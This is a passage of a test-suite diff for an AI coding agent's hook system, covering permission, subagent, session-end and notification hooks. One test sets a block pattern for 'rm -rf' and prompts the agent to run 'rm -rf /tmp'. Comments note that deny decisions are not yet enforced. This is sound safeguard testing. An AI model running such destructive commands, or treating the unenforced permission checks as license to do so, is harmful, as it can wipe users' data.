}); + + it('should handle multiple hooks all returning allow', async () => { + const allow1Script = + 'echo \'{"decision": "allow", "reason": "First allows"}\''; + const allow2Script = + 'echo \'{"decision": "allow", "reason": "Second allows"}\''; + + await rig.setup('session-end-multi-all-allow', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allow1Script, + name: 'session-end-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allow2Script, + name: 'session-end-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1Script = + 'echo {decision: "allow", hookSpecificOutput: {additionalContext: "context from session end hook 1"}}'; + const context2Script = + 'echo {decision: "allow", hookSpecificOutput: {additionalContext: "context from session end hook 2"}}'; + + await rig.setup('session-end-multi-context', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: context1Script, + name: 'session-end-context-1', + timeout: 5000, + }, + { + type: 'command', + command: context2Script, + name: 'session-end-context-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + + it('should handle hook with error alongside blocking hook', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + + await rig.setup('session-end-error-with-block', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/command', + name: 'session-end-error-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say test'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should handle hook timeout alongside blocking hook', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + + await rig.setup('session-end-timeout-with-block', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 60', + name: 'session-end-timeout-hook', + timeout: 1000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say test'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should handle system messages from multiple hooks', async () => { + const msg1Script = + 'echo \'{"decision": "allow", "systemMessage": "System message 1 from SessionEnd"}\''; + const msg2Script = + 'echo \'{"decision": "allow", "systemMessage": "System message 2 from SessionEnd"}\''; + + await rig.setup('session-end-multi-system-msg', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: msg1Script, + name: 'session-end-msg-1', + timeout: 5000, + }, + { + type: 'command', + command: msg2Script, + name: 'session-end-msg-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); expect(result).toBeDefined(); }); }); @@ -1785,12 +3253,15 @@ describe('Hooks System Integration', () => { // ========================================================================== // Combined Hooks - // Tests for using multiple hook types (UserPromptSubmit + Stop) together + // Tests for using multiple hook types together + // ========================================================================== + // Combined Hooks + // Tests for using multiple hook types together // ========================================================================== describe('Combined Hooks', () => { it('should execute both Stop and UserPromptSubmit hooks in same session', async () => { - const stopScript = 'echo {"decision": "allow"}'; - const upsScript = 'echo {"decision": "allow"}'; + const stopScript = 'echo \'{"decision": "allow"}\''; + const upsScript = 'echo \'{"decision": "allow"}\''; await rig.setup('combined-both-hooks', { settings: { @@ -1828,6 +3299,168 @@ describe('Hooks System Integration', () => { const result = await rig.run('Say both hooks'); expect(result).toBeDefined(); }); + + it('should execute multiple hook types together', async () => { + const upsScript = 'echo \'{"decision": "allow"}\''; + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('combined-ups-sessionend', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + UserPromptSubmit: [ + { + hooks: [ + { + type: 'command', + command: upsScript, + name: 'ups-hook', + timeout: 5000, + }, + ], + }, + ], + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-hook', + timeout: 5000, + }, + ], + }, + ], + }, + trusted: true, + }, + }); + + const result = await rig.run('Say hello with multiple hooks'); + expect(result).toBeDefined(); + }); + + it('should execute Stop, UserPromptSubmit and SessionEnd hooks together', async () => { + const stopScript = 'echo \'{"decision": "allow"}\''; + const upsScript = 'echo \'{"decision": "allow"}\''; + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('combined-three-hooks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Stop: [ + { + hooks: [ + { + type: 'command', + command: stopScript, + name: 'stop-hook', + timeout: 5000, + }, + ], + }, + ], + UserPromptSubmit: [ + { + hooks: [ + { + type: 'command', + command: upsScript, + name: 'ups-hook', + timeout: 5000, + }, + ], + }, + ], + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-hook', + timeout: 5000, + }, + ], + }, + ], + }, + trusted: true, + }, + }); + + const result = await rig.run('Say hello with three hooks'); + expect(result).toBeDefined(); + }); + + it('should execute all hook types together', async () => { + const stopScript = 'echo \'{"decision": "allow"}\''; + const upsScript = 'echo \'{"decision": "allow"}\''; + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + const permissionScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('combined-all-hooks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Stop: [ + { + hooks: [ + { + type: 'command', + command: stopScript, + name: 'stop-hook', + timeout: 5000, + }, + ], + }, + ], + UserPromptSubmit: [ + { + hooks: [ + { + type: 'command', + command: upsScript, + name: 'ups-hook', + timeout: 5000, + }, + ], + }, + ], + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-hook', + timeout: 5000, + }, + ], + }, + ], + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: permissionScript, + name: 'permission-hook', + timeout: 5000, + }, + ], + }, + ], + }, + trusted: true, + }, + }); + + const result = await rig.run('Say hello with all hooks'); + expect(result).toBeDefined(); + }); }); // ========================================================================== @@ -1837,7 +3470,7 @@ describe('Hooks System Integration', () => { describe('Hook Script File Tests', () => { it('should execute hook from script file', async () => { const scriptFileHook = - 'echo {"decision": "allow", "reason": "Approved by script file", "hookSpecificOutput": {"additionalContext": "Script file executed successfully"}}'; + 'echo \'{"decision": "allow", "reason": "Approved by script file", "hookSpecificOutput": {"additionalContext": "Script file executed successfully"}}\''; await rig.setup('script-file-hook', { settings: { @@ -1893,4 +3526,2495 @@ describe('Hooks System Integration', () => { await expect(rig.run('Create a file')).rejects.toThrow(/block/i); }); }); + + // ========================================================================== + // PermissionRequest Hooks + // Tests for permission request lifecycle hooks that control tool access + // ========================================================================== + describe('PermissionRequest Hooks', () => { + describe('Single PermissionRequest Hook - Allow Scenarios', () => { + it('should allow tool execution when hook returns allow decision', async () => { + const allowScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Tool access granted by permission hook"}}\''; + + await rig.setup('permission-req-allow-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'permission-req-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Create a file test.txt with content "hello"', + ); + expect(result).toBeDefined(); + + const fileContent = rig.readFile('test.txt'); + expect(fileContent).toContain('hello'); + }); + + it('should allow specific tools based on tool name matching', async () => { + const allowSafeToolsScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + + if [ "$TOOL_NAME" = "Read" ] || [ "$TOOL_NAME" = "Grep" ]; then + echo '{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Safe tool access granted"}}' + else + echo '{}' + fi + `; + + await rig.setup('permission-req-allow-safe-tools', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: 'Read|Grep', + hooks: [ + { + type: 'command', + command: allowSafeToolsScript, + name: 'permission-req-allow-safe-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Test with a Read operation + const result = await rig.run('Read the package.json file'); + expect(result).toBeDefined(); + }); + }); + + describe('Single PermissionRequest Hook - Deny Scenarios', () => { + it('should deny tool execution when hook returns deny decision', async () => { + const denyScript = + 'echo \'{"decision": "deny", "reason": "Tool execution denied by security hook", "hookSpecificOutput": {"additionalContext": "Security policy violation"}}\''; + + await rig.setup('permission-req-deny-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: denyScript, + name: 'permission-req-deny-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Note: Currently the PermissionRequest deny decision may not block tool execution + // This test verifies that the hook is executed and returns the expected decision + const result = await rig.run( + 'Create a file denied.txt with content "should be blocked"', + ); + expect(result).toBeDefined(); + + // The hook is triggered but current implementation may not block execution + // This highlights the gap where deny decisions don't prevent tool execution + // In future, we'd expect the deny decision to block execution and result to contain deny-related message + }); + + it('should block dangerous operations based on tool input matching', async () => { + const blockDangerousOpsScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + COMMAND=$(echo "$INPUT" | jq -r '.tool_input.command // empty') + + if [ "$TOOL_NAME" = "Bash" ] && [[ "$COMMAND" == *"rm -rf"* ]]; then + echo '{"decision": "deny", "reason": "Dangerous command blocked", "hookSpecificOutput": {"additionalContext": "Security threat detected"}}' + else + echo '{"decision": "allow"}' + fi + `; + + await rig.setup('permission-req-block-dangerous', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: 'Bash', + hooks: [ + { + type: 'command', + command: blockDangerousOpsScript, + name: 'permission-req-block-dangerous-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // This command should ideally be blocked by the hook + // Note: Currently the PermissionRequest deny decision may not block tool execution + const result = await rig.run('Execute bash command: rm -rf /tmp'); + expect(result).toBeDefined(); + + // The hook system correctly identifies dangerous operations + // But current implementation may not fully enforce the deny decision + }); + }); + + describe('Multiple PermissionRequest Hooks - Allow Scenarios', () => { + it('should allow tool execution when all hooks return allow decision', async () => { + const allowScript1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "First permission check passed"}}\''; + const allowScript2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Second permission check passed"}}\''; + + await rig.setup('permission-req-multi-allow', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: allowScript1, + name: 'permission-req-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allowScript2, + name: 'permission-req-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Create a file multi-test.txt with content "multi allow"', + ); + expect(result).toBeDefined(); + + const fileContent = rig.readFile('multi-test.txt'); + expect(fileContent).toContain('multi allow'); + }); + + it('should allow execution with sequential permission checks', async () => { + const allowScript1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "First sequential check passed"}}\''; + const allowScript2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Second sequential check passed"}}\''; + + await rig.setup('permission-req-sequential-allow', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: allowScript1, + name: 'permission-req-seq-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allowScript2, + name: 'permission-req-seq-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Read this test file'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple PermissionRequest Hooks - Deny Scenarios', () => { + it('should deny tool execution when one hook returns deny decision in parallel', async () => { + const allowScript = 'echo \'{"decision": "allow"}\''; + const denyScript = + 'echo \'{"decision": "deny", "reason": "Denied by security policy"}\''; + + await rig.setup('permission-req-multi-one-denies', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'permission-req-allow-parallel', + timeout: 5000, + }, + { + type: 'command', + command: denyScript, + name: 'permission-req-deny-parallel', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Note: Currently the PermissionRequest deny decision may not block tool execution + // In a proper implementation, one deny decision among parallel hooks should block execution + const result = await rig.run( + 'Create a file blocked.txt with content "should not be created"', + ); + expect(result).toBeDefined(); + + // This test demonstrates the current behavior where deny decisions may not block execution + // Future implementation should ensure that a deny decision blocks the tool execution + }); + + it('should deny execution when first sequential hook denies', async () => { + const denyScript = + 'echo \'{"decision": "deny", "reason": "First check denied execution"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('permission-req-sequential-first-denies', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: denyScript, + name: 'permission-req-seq-deny-first', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'permission-req-seq-allow-second', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Note: Currently the PermissionRequest deny decision may not block tool execution + // In a proper implementation, the first deny decision should prevent subsequent hooks from executing + // and block the tool execution entirely + const result = await rig.run( + 'Try to write a file that should be blocked', + ); + expect(result).toBeDefined(); + + // This test highlights where the implementation could be strengthened + // to properly respect deny decisions in sequential hook execution + }); + }); + + describe('PermissionRequest Matcher Scenarios', () => { + it('should match specific tools with regex matcher', async () => { + const specificToolScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Specific tool matched and allowed"}}\''; + + await rig.setup('permission-req-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: 'Read|Write', + hooks: [ + { + type: 'command', + command: specificToolScript, + name: 'permission-req-specific-tool-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Read the current directory'); + expect(result).toBeDefined(); + }); + + it('should match all tools with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard matcher allowed all tools"}}\''; + + await rig.setup('permission-req-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'permission-req-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // SubagentStart Hooks + // Triggered when a subagent is spawned via the Task tool + // ========================================================================== + describe('SubagentStart Hooks', () => { + describe('Single SubagentStart Hook', () => { + it('should execute SubagentStart hook when a subagent is launched', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Subagent start approved"}}\''; + + await rig.setup('subagent-start-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'subagent-start-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Use the Task tool to trigger SubagentStart + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello from subagent"', + ); + expect(result).toBeDefined(); + }); + + it('should inject additional context from SubagentStart hook', async () => { + const contextScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Security check passed for subagent"}}\''; + + await rig.setup('subagent-start-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'subagent-start-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // The additional context should be available to the subagent + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should execute SubagentStart hook with additional context', async () => { + const contextScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Audit log created"}}\''; + + await rig.setup('subagent-start-context-only', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'subagent-start-context-only-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // The hook should be called and subagent should execute normally + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should handle error when SubagentStart hook command fails', async () => { + const errorScript = 'echo "some error output" >&2; exit 1'; + + await rig.setup('subagent-start-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: errorScript, + name: 'subagent-start-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Even with error hooks, the subagent should still run + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SubagentStart Hooks', () => { + it('should execute multiple SubagentStart hooks in parallel', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook1 executed"}}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook2 executed"}}\''; + + await rig.setup('subagent-start-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-start-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-start-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(0); + }); + + it('should execute multiple SubagentStart hooks sequentially', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook1 executed"}}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook2 executed"}}\''; + + await rig.setup('subagent-start-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-start-seq-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-start-seq-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked sequentially + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(0); + }); + }); + + describe('SubagentStart Matcher Scenarios', () => { + it('should match specific agent types with exact matcher', async () => { + const specificAgentScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Specific agent type matched"}}\''; + + await rig.setup('subagent-start-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + matcher: 'Bash', + hooks: [ + { + type: 'command', + command: specificAgentScript, + name: 'subagent-start-specific-agent-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // This should trigger the hook since we're launching a bash subagent + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should match all agent types with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Wildcard matcher matched all agent types"}}\''; + + await rig.setup('subagent-start-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'subagent-start-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // SubagentStop Hooks + // Triggered when a subagent finishes responding + // ========================================================================== + describe('SubagentStop Hooks', () => { + describe('Single SubagentStop Hook', () => { + it('should execute SubagentStop hook when a subagent finishes', async () => { + const hookScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Subagent stop processed"}}\''; + + await rig.setup('subagent-stop-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'subagent-stop-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Use the Task tool to trigger both SubagentStart and SubagentStop + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello from subagent"', + ); + expect(result).toBeDefined(); + }); + + it('should allow subagent to continue when SubagentStop hook blocks and requires continuation', async () => { + // Create a script that returns block only once, then allow + const blockOnceScript = + 'if [ -f hook_stop_state.txt ]; then echo \'{"decision": "allow"}\'; else echo "blocked_once" > hook_stop_state.txt; echo \'{"decision": "block", "reason": "File writing blocked by security policy, retrying..."}\'; fi'; + + await rig.setup('subagent-stop-block-once', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: blockOnceScript, + name: 'subagent-stop-block-once-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When SubagentStop hook blocks once, the subagent should receive the feedback and continue + const result = await rig.run( + 'Use the Task tool to create a bash subagent to write a test file with "hello"', + ); + expect(result).toBeDefined(); + + // Verify that the state file was created with expected content (indicating block was triggered once) + const stateContent = rig.readFile('hook_stop_state.txt'); + expect(stateContent).toContain('blocked_once'); + }); + + it('should handle error when SubagentStop hook command fails', async () => { + const errorScript = 'echo "some error output" >&2; exit 1'; + + await rig.setup('subagent-stop-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: errorScript, + name: 'subagent-stop-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Even with error hooks, the subagent should still complete + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SubagentStop Hooks', () => { + it('should execute multiple SubagentStop hooks in parallel', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + + await rig.setup('subagent-stop-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-stop-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-stop-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(2); + }); + + it('should execute multiple SubagentStop hooks sequentially', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + + await rig.setup('subagent-stop-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-stop-seq-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-stop-seq-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked sequentially + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(2); + }); + }); + + describe('SubagentStop Matcher Scenarios', () => { + it('should match specific agent types with exact matcher', async () => { + const specificAgentScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Specific agent type matched and allowed at stop"}}\''; + + await rig.setup('subagent-stop-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + matcher: 'Bash', + hooks: [ + { + type: 'command', + command: specificAgentScript, + name: 'subagent-stop-specific-agent-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // This should trigger the hook since we're launching a bash subagent + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should match all agent types with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard matcher allowed all agent types at stop"}}\''; + + await rig.setup('subagent-stop-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'subagent-stop-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // Notification Hooks + // Triggered when various notification events occur + // ========================================================================== + describe('Notification Hooks', () => { + describe('Idle Prompt Notifications', () => { + it('should handle idle prompt notifications correctly', async () => { + const idlePromptScript = + 'echo \'{"additionalContext": "Idle prompt notification processed"}\''; + await rig.setup('notification-idle-prompt', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: idlePromptScript, + name: 'notification-idle-prompt-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Simulate an idle prompt scenario - this might involve simulating a timeout + const result = await rig.run('Say idle prompt notification test'); + + expect(result).toBeDefined(); + }); + + it('should process multiple idle prompt notifications', async () => { + const idlePromptScript1 = + 'echo \'{"additionalContext": "First idle prompt notification"}\''; + const idlePromptScript2 = + 'echo \'{"additionalContext": "Second idle prompt notification"}\''; + await rig.setup('notification-idle-prompt-multiple', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: idlePromptScript1, + name: 'notification-idle-prompt-hook-1', + timeout: 5000, + }, + { + type: 'command', + command: idlePromptScript2, + name: 'notification-idle-prompt-hook-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Say multiple idle prompt notification test', + ); + + expect(result).toBeDefined(); + }); + }); + + describe('Elicitation Dialog Notifications', () => { + it('should handle elication dialog notifications correctly', async () => { + const elicationDialogScript = + 'echo \'{"additionalContext": "Elicitation dialog notification processed"}\''; + + await rig.setup('notification-elication-dialog', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: elicationDialogScript, + name: 'notification-elication-dialog-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Simulate an elication dialog scenario + const result = await rig.run('Say elication dialog notification test'); + + expect(result).toBeDefined(); + }); + + it('should handle multiple elication dialog notifications', async () => { + const elicationDialogScript1 = + 'echo \'{"additionalContext": "First elication dialog notification"}\''; + const elicationDialogScript2 = + 'echo \'{"additionalContext": "Second elication dialog notification"}\''; + await rig.setup('notification-elication-dialog-multiple', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: elicationDialogScript1, + name: 'notification-elication-dialog-hook-1', + timeout: 5000, + }, + { + type: 'command', + command: elicationDialogScript2, + name: 'notification-elication-dialog-hook-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Say multiple elication dialog notification test', + ); + + expect(result).toBeDefined(); + }); + + it('should handle elication dialog notification with error', async () => { + await rig.setup('notification-elication-dialog-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: 'nonexistent_command_xyz', + name: 'notification-elication-dialog-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Error should be handled gracefully and not block execution + const result = await rig.run('Say elication dialog error test'); + + expect(result).toBeDefined(); + }); + }); + + describe('Multiple Notification Hooks', () => { + it('should handle multiple different notification types correctly', async () => { + const notificationScript1 = + 'echo \'{"additionalContext": "Generic notification 1"}\''; + const notificationScript2 = + 'echo \'{"additionalContext": "Generic notification 2"}\''; + + await rig.setup('notification-multiple-different', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: notificationScript1, + name: 'notification-multiple-hook-1', + timeout: 5000, + }, + { + type: 'command', + command: notificationScript2, + name: 'notification-multiple-hook-2', 